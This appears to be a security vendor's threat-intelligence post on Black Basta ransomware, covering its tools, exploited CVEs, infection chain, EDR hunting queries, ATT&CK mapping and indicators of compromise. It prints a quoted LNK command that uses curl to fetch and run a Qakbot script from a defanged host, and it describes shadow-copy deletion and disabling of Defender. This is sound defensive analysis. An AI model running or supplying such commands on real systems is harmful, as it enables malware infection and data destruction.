- Short Summary: Black Basta is a ransomware group that operates as ransomware-as-a-service (RaaS), first identified in April 2022. They employ double extortion tactics, demanding payment for both decryption and non-release of stolen data. The group has impacted over 500 organizations globally, utilizing common initial access methods such as phishing and exploitation of vulnerabilities.
- Key Points:
- Black Basta uses double extortion techniques.
- First spotted in April 2022, linked to over 500 organizations worldwide.
- Common initial access methods include phishing, Qakbot, and Cobalt Strike.
- Known to exploit various vulnerabilities for access and lateral movement.
- Tools used include Qakbot, Cobalt Strike, Mimikatz, and others.
- Ransomware encrypts files using the ChaCha20 algorithm and RSA-4096 key.
- Employs various tactics for evading detection and maintaining persistence.
- MITRE ATT&CK TTPs – created by AI
- Initial Access
- Phishing – T1566
- Exploit Public-Facing Application – T1190
- Discovery
- File and Directory Discovery – T1083
- Execution
- User Execution: Malicious File – T1204.002
- Command and Scripting Interpreter: Windows Command Shell – T1059.003
- Windows Management Instrumentation – T1047
- Command and Scripting Interpreter: PowerShell – T1059.001
- Persistence
- Create or Modify System Process: Windows Service – T1543.003
- Privilege Escalation
- Exploitation for Privilege Escalation – T1068
- Defense Evasion
- Virtualization/Sandbox Evasion – T1497
- Impair Defenses: Safe Mode Boot – T1562.009
- Masquerading – T1036
- Modify Registry – T1112
- Impair Defenses: Disable or Modify Tools – T1562.001
- Impact
- Inhibit System Recovery – T1490
- Data Encrypted for Impact – T1486
- Initial Access
Table of Contents
Overview
Black Basta is a ransomware group operating as ransomware-as-a-service (RaaS), first spotted in April 2022. It is known to use double extortion techniques where the group demands payment for the decryption and non-release of stolen data. Earlier versions of Black Basta share many similarities with Conti Ransomware.
A wide range of industries and critical infrastructure in North America, Europe, and Australia have been impacted by Black Basta. To date, 500+ organizations have been affected globally by Black Basta affiliates gaining initial access through common methods like phishing, Qakbot, Cobalt Strike, and exploitation of known vulnerabilities. Once inside, the bad actors move laterally within the network to identify critical systems and data before deploying ransomware. Black Basta has been associated with the FIN7 threat actor due to similarities in custom modules for evading Endpoint Detection and Response (EDR) systems.
A list of known tools that the Black Basta group abused includes malware, adversary emulation, and legitimated tools:
| BITSAdmin | Mimikatz | RClone | Splashtop | WMI |
| Cobalt Strike | SoftPerfect | WinSCP | Mimikatz | Qakbot |
| PowerShell | ScreenConnect | PSExec | EvilProxy | SystemBC |
| Backstab | Netcat | Quick Assist | NetSupport Manager |
Black Basta is also known to exploit various vulnerabilities for initial access, privilege escalation, and lateral movement. Here is the list of vulnerabilities exploited by Black Basta:
| Name | CVE ID | CWE ID |
| ConnectWise | CVE-2024-1709 | CWE-288 |
| Windows Error Reporting Service | CVE-2024-26169 | CWE-269 |
| ZeroLogon | CVE-2020-1472 | CWE-330 |
| NoPac | CVE-2021-42278 | CWE-20 |
| NoPac | CVE-2021-42287 | CWE-269 |
| PrintNightmare | CVE-2021-34527 | CWE-269 |
Technical Analysis
The Black Basta infection chain usually starts with a spear phishing email campaign that delivers a malicious link or attachment to the victim. Other initial infection vectors, like exploitation of vulnerabilities and remote desktop protocol (RDP), were also used by this threat actor.
Downloaded zip archives contain malicious .lnk(shortcut) or an Excel file that downloads and executes Qakbot malware.
/q /c MD "%APPDATA%xxxxxx" && curl.exe --output %APPDATA%xxxxxxqakbot.js hxxps://xxxxx[.]com/xxx.js && cd "%APPDATA%xxxxxx" && wscript qakbot.js
As shown in the command in LNK file, Curl and WScript are used to download and execute the Qakbot JavaScript file.
Upon execution, Qakbot established persistence using autorun entries and scheduled tasks, and for defensive evasion, various PowerShell script is executed to disable and remove the Windows Defender Antivirus protection.
Qakbot also established C2 communication with the threat actor to deliver other malware like SystemBC, Cobalt Strike, etc., and legitimate tools such as BITSAdmin, Splashtop, Screen Connect, etc. Based on the TTPs employed by the affiliates of Black Basta, these tools/malware help in different phases of attacks, like Discovery, Privilege escalation, Credential access, and Lateral movement.
Admin credentials are obtained via tools like Mimikatz, which is used for credential dumping and pass-the-hash attacks. CobaltStrike Beacons enable the threat actor to move laterally and deploy ransomware across the network.
Once installed and established on the victim’s network, Black Basta first identifies and collects sensitive files for exfiltration. Rclone and WinSCP tools are used to exfiltrate data. Rclone provides the ability to upload data to configured cloud storage provider mostly Mega.
The next stage of the double extortion technique, after the exfiltration of data, is to encrypt endpoints with Black Basta ransomware. The ransomware binary uses vssadmin.exe to delete the shadow copy files to prevent system recovery.
As depicted in the screenshot below, bcdedit.exe is leveraged to reboot the system in safe mode to disable endpoint defenses and start the operating system with a limited set of drivers and services.
Once the system is rebooted in safe mode, Black Basta uses the ChaCha20 algorithm to encrypt files. The ChaCha20 encryption key is then encrypted with a public RSA-4096 key that is included in the executable.
It will also drop *.jpg and *.ico files on the %temp% directory and use registry modification to change the desktop background and file icon after encryption. The following are the registries that have been created/modified:
The ransomware then generates multiple instances of a file, either named “readme.txt” or “instructions_read_me.txt” depending on the variant, which includes the following ransom note:
Hunting Queries
Qualys Endpoint Detection and Response (EDR) customers use these hunting queries to detect suspicious activities associated with Black Basta Ransomware. For any hits, investigate the file modifications, network connections, child/parent processes, and cross-process injections. Qualys also recommends tuning hunting queries for any false positives as per the customer environment.
| Procedure | TID | Query |
| Using vssadmin to delete Shadow copy files | T1490 | (parent.name:cmd.exe and process.name:vssadmin.exe and process.arguments:”delete shadows”) |
| Reboot victim’s machine in safe mode using bcdedit | T1562.009 | (parent.name:cmd.exe and process.name:bcdedit.exe and process.arguments:”safeboot network”) |
| Qakbot JS file dropped using curl into %AppData% directory | T1105 | (parent.name:curl.exe and (file.fullpath:AppData or file.extension:js)) |
| Disable Windows Defender protection using PowerShell | T1562.001 | (process.name:powershell.exe and (process.arguments:DisableAntiSpyware or process.arguments:DisableRealtimeMonitoring)) |
| Hunting for Ransom Note | T1486 | (file.extension:txt and (file.name:”readme.txt” or file.name:”instructions_read_me.txt”)) |
MITRE ATT&CK Techniques
| Tactic | Technique | ID |
| Initial Access | Phishing | T1566 |
| Initial Access | Exploit Public-Facing Application | T1190 |
| Discovery | File and Directory Discovery | T1083 |
| Execution | User Execution: Malicious File | T1204.002 |
| Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 |
| Execution | Windows Management Instrumentation | T1047 |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Persistence | Create or Modify System Process: Windows Service | T1543.003 |
| Privilege Escalation | Exploitation for Privilege Escalation | T1068 |
| Defense Evasion | Virtualization/Sandbox Evasion | T1497 |
| Defense Evasion | Impair Defenses: Safe Mode Boot | T1562.009 |
| Defense Evasion | Masquerading | T1036 |
| Defense Evasion | Modify Registry | T1112 |
| Defense Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 |
| Impact | Inhibit System Recovery | T1490 |
| Impact | Data Encrypted for Impact | T1486 |
Indicators of Compromise
| Indicator | Type | Name |
| 17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90 | SHA256 | Black Basta |
| b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9 | SHA256 | Black Basta |
| 88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc | SHA256 | Black Basta |
| 58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd | SHA256 | Black Basta |
| 39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead | SHA256 | Black Basta |
| 5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221 | SHA256 | Black Basta |
| 51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e | SHA256 | Black Basta |
| d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1 | SHA256 | Black Basta |
| 5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43 | SHA256 | Black Basta |
| 05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431 | SHA256 | Black Basta |
| a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6 | SHA256 | Black Basta |
| 86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737 | SHA256 | Black Basta |
| 07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799 | SHA256 | Black Basta |
| 96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be | SHA256 | Black Basta |
| 1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779 | SHA256 | Black Basta |
| 360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98 | SHA256 | Black Basta |
| 0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a | SHA256 | Black Basta |
| 9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc | SHA256 | Black Basta |
| 62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087 | SHA256 | Black Basta |
| 7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59 | SHA256 | Black Basta |
| 350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd | SHA256 | Black Basta |
| 90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7 | SHA256 | Black Basta |
| fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08 | SHA256 | Black Basta |
| acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f | SHA256 | Black Basta |
| d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d | SHA256 | Black Basta |
| f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4 | SHA256 | Black Basta |
| 723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224 | SHA256 | Black Basta |
| ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e | SHA256 | Black Basta |
| fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f | SHA256 | Black Basta |
| df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415 | SHA256 | Black Basta |
| 462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7 | SHA256 | Black Basta |
| 3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a | SHA256 | Black Basta |
| 5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa | SHA256 | Black Basta |
| 37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004 | SHA256 | Black Basta |
| 3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35 | SHA256 | Black Basta |
| 17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20 | SHA256 | Black Basta |
| 42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78 | SHA256 | Black Basta |
| 882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3 | SHA256 | Black Basta |
| e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757 | SHA256 | Black Basta |
| 0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e | SHA256 | Black Basta |
| 69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944 | SHA256 | Black Basta |
| 3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a | SHA256 | Black Basta |
| 7883f01096db9bcf090c2317749b6873036c27ba92451b212b8645770e1f0b8a | SHA256 | Black Basta |
| 0c964ac2f65f270eb19982b04ae346e72976bdf19b88ffd2308700dcce2b5ec0 | SHA256 | Black Basta |
| 0db7a0327192710c403e021cbfc3902d75c729b3ba59d87159bf8f59a151a481 | SHA256 | Black Basta |
| ab913b3bb637447f33add3c7020d353389738e4d532b905caed04c7c7f399277 | SHA256 | Black Basta |
| a199c9d91a1e7c7051ec40f0a3a51143aa9f06af47a2a5f0e2dd235d7e1fe386 | SHA256 | Black Basta |
| 699aaea1598a034cde7ed88cd8a8a36fd59447e09bddef566357061774c48a76 | SHA256 | Black Basta |
| 53a06b78d89fe3f981ff32cd7a66f31e099d4bbaac36d7c64ed08d615d314408 | SHA256 | Black Basta |
| 1d040540c3c2ed8f73e04c578e7fb96d0b47d858bbb67e9b39ec2f4674b04250 | SHA256 | Black Basta |
| 9f948af3a30f125dcd24d8a628b3a18c66b3d72baede8496ee735cbdfd9cf0c7 | SHA256 | Black Basta |
| 1391c20a26f248f7c602f20096bf1886cfe7e4d151602a1258a9bbe7c02c1c80 | SHA256 | Black Basta |
| 5b6c3d277711d9f847be59b16fd08390fc07d3b27c7c6804e2170f456e9f1173 | SHA256 | Black Basta |
| 15abbff9fbce7f5782c1654775938dcd2ce0a8ebd683a008547f8a4e421888c4 | SHA256 | Black Basta |
| d943a4aabd76582218fd1a9a0a77b2f6a6715b198f9994f0feae6f249b40fdf9 | SHA256 | Black Basta |
| d1949c75e7cb8e57f52e714728817ce323f6980c8c09e161c9e54a1e72777c13 | SHA256 | Black Basta |
| 1ed076158c8f50354c4dba63648e66c013c2d3673d76ac56582204686aae6087 | SHA256 | Black Basta |
| 48976d7bf38cca4e952507e9ab27e3874ca01092eed53d0fde89c5966e9533bb | SHA256 | Black Basta |
| 21033cd24a9d775d7daa7bbc5c5b007553f205ac0febb6bae3fa35c700676bda | SHA256 | Black Basta |
| cce74c82a718be7484abf7c51011793f2717cfb2068c92aa35416a93cbd13cfa | SHA256 | Black Basta |
| 09bc7247b50a166996b667b9a6e696cfbafa203ffcbec46ad0cca27deacd5c25 | SHA256 | Black Basta |
| 449d87ca461823bb85c18102605e23997012b522c4272465092e923802a745e9 | SHA256 | Black Basta |
| dc56a30c0082145ad5639de443732e55dd895a5f0254644d1b1ec1b9457f04ff | SHA256 | Black Basta |
| affcb453760dbc48b39f8d4defbcc4fc65d00df6fae395ee27f031c1833abada | SHA256 | Black Basta |
| 203d2807df6ef531efbec7bfd109986de3e23df64c01ea4e337cbe5ba675248b | SHA256 | Black Basta |
| ab1a3f8a0510ffa3c043bc200fe357c9ce220ea916f50b8b5b454027ef935c54 | SHA256 | Black Basta |
| 3eb22320da23748f76f2ce56f6f627e4255bc81d09ffb3a011ab067924d8013b | SHA256 | Black Basta |
| 50f45122fdd5f8ca05668a385a734a278aa126ded185c3377f6af388c41788cb | SHA256 | Black Basta |
| a54fef5fe2af58f5bd75c3af44f1fba22b721f34406c5963b19c5376ab278cd1 | SHA256 | Black Basta |
| df9498892ae72f611128c9a8bc57b93964f34cc235f5aaf57fe10fb2b3c69aa3 | SHA256 | Black Basta |
| 1fd42d07b4be99e0e503c0ed5af2274312be1b03e01b54a6d89c0eef04257d6e | SHA256 | Black Basta |
| 9f188b2f4aa6a5ff3a6fb9048a20c5566f25bd9fb313ed1ba1d332fadd82690f | SHA256 | Black Basta |
| f14c7eacdb39f1decdcf1e68f57c87340968fede1dc0391b2b082f58bd3a3f93 | SHA256 | Black Basta |
| d8e9e06b7adea939bcc135876f4e8a1d3719120e8ad9d4d72812ffd1dbee62fc | SHA256 | Black Basta |
| 0da309cc4f0d21c76c26d7b4f1c65bb1659908f191edb01d76ff22c8dabef0b1 | SHA256 | Black Basta |
| 46be54f719ee76af15099de6e337b05a0a442c813e815bbed92a71135cfd9ab2 | SHA256 | Black Basta |
| dd32c037ed9b72acb6eda4f5193c7f1adc1e7e8d2aefcdd4b16de2f48420e1d3 | SHA256 | Black Basta |
| 0bce6dc27d2cbdc231b563427c3489ddc69a0a88012abccd49b32c931dd93a81 | SHA256 | Black Basta |
| 4b83aaecddfcb8cf5caeff3cb30fee955ecfc3eea97d19dccf86f24c77c41fc4 | SHA256 | Black Basta |
| 5211ad84270862e68026ce8e6c15c1f8499551e19d2967c349b46d3f8cfcdcaa | SHA256 | Black Basta |
| b18b40f513bae376905e259d325c12f9d700ee95f0d908a4d977a80c0420d52e | SHA256 | Black Basta |
| trailshop[.]net | C2 Domain | Cobalt Strike |
| realbumblebee[.]net | C2 Domain | Cobalt Strike |
| recentbee[.]net | C2 Domain | Cobalt Strike |
| investrealtydom[.]net | C2 Domain | Cobalt Strike |
| webnubee[.]com | C2 Domain | Cobalt Strike |
| artspathgroup[.]net | C2 Domain | Cobalt Strike |
| buyblocknow[.]com | C2 Domain | Cobalt Strike |
| currentbee[.]net | C2 Domain | Cobalt Strike |
| modernbeem[.]net | C2 Domain | Cobalt Strike |
| startupbusiness24[.]net | C2 Domain | Cobalt Strike |
| magentoengineers[.]com | C2 Domain | Cobalt Strike |
| childrensdolls[.]com | C2 Domain | Cobalt Strike |
| myfinancialexperts[.]com | C2 Domain | Cobalt Strike |
| limitedtoday[.]com | C2 Domain | Cobalt Strike |
| kekeoamigo[.]com | C2 Domain | Cobalt Strike |
| nebraska-lawyers[.]com | C2 Domain | Cobalt Strike |
| tomlawcenter[.]com | C2 Domain | Cobalt Strike |
| thesmartcloudusa[.]com | C2 Domain | Cobalt Strike |
| rasapool[.]net | C2 Domain | Cobalt Strike |
| artspathgroupe[.]net | C2 Domain | Cobalt Strike |
| specialdrills[.]com | C2 Domain | Cobalt Strike |
| thetrailbig[.]net | C2 Domain | Cobalt Strike |
Stay to the “Left of Boom” of Emerging Threats
Get notified of the latest threat intelligence, vulnerabilities, and cybersecurity updates.
Subscribe to the Qualys blog.